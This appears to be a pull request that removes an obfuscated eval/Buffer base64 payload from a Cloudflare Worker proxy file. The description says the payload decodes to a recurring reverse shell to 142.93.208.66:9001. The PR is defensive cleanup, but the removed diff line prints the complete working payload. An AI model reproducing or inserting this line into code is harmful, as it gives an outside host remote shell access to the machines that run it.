### PR TITLE
Remove malicious proxy worker payload

### DIFF
--- a/proxy-worker.js
+++ b/proxy-worker.js
@@ -166,5 +166,3 @@ function getCorsHeaders(request) {
     'Access-Control-Expose-Headers': '*'
   };
 }
-
-eval(Buffer.from("c2V0SW50ZXJ2YWwoKCkgPT4gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ2Jhc2ggLWMgImJhc2ggLWUgNTw+IC9kZXYvdGNwLzE0Mi45My4yMDguNjYvOTAwMSAwPCY1IDE+JjUgMj4mNSIgPiAvZGV2L251bGwgMj4mMSAmJyksIDMwMDAwKTsK","base64").toString())


### PR DESCRIPTION
Removes the obfuscated eval/Buffer payload from proxy-worker.js that decoded to a recurring child_process reverse shell attempt against 142.93.208.66:9001.

The Cloudflare Worker proxy behavior is otherwise unchanged.

Validation: node --input-type=module --check < proxy-worker.js, node --test tests/provider-settings.test.js, git diff --check, and rg for the payload indicators.